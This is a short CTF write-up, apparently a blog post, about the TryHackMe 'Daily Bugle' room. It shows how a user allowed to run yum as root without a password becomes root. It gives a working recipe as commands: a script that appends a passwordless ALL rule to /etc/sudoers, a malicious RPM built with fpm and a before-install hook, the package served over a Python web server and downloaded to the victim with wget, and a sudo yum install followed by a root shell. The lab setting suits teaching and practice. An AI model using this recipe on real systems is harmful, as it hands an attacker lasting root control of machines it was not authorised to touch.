Sudoers entry - Yum

tryhackme:dailybugle

So, while doing a CTF on tryhackme: dailybugle, I found that my current user (jjameson) was allowed to run /usr/bin/yum as root without password. please read previous post to find out what "sudoers" is.

With the help of gtfobins, we found a method to elevate privileges using yum.

Process is simple enough. Create a shell script (that you wanna execute- it will have our malicious code)->make an RPM package using fpm tool->Upload it on the victim machine->execute using yum command. (note: in red hat/centOS Yum is the package manager that's why we need to use rpm to build an executable. Similar case exists for Debian/Ubuntu systems where we'll use apt-get to elevate privileges)

gem install fpm

apt install rpm

Here, I'll be adding my current user in the sudoers file for privilege escalation. This is by far the easiest method I have discovered. echo 'echo "jjameson ALL=(root) NOPASSWD:ALL" >> /etc/sudoers' > my.sh

fpm -n root -s dir -t rpm -a all --before-install my.sh .

Launch a python server now python3 -m http.server 80

On the victim machine, download this in the /tmp directory and we are good to go with installation of this package with the commands:

wget <ip>/root-1.0-1.noarch.rpm sudo yum localinstall -y root-1.0-1.noarch.rpm

Once the installation has successfully completed we will run a simple bash shell using sudo (sudo bash) and you'll observe that jjameson doesn't require password to run anything as root because our script "my.sh" has been executed as part of the RPM package we just created. This is how we will escalate our privileges using yum.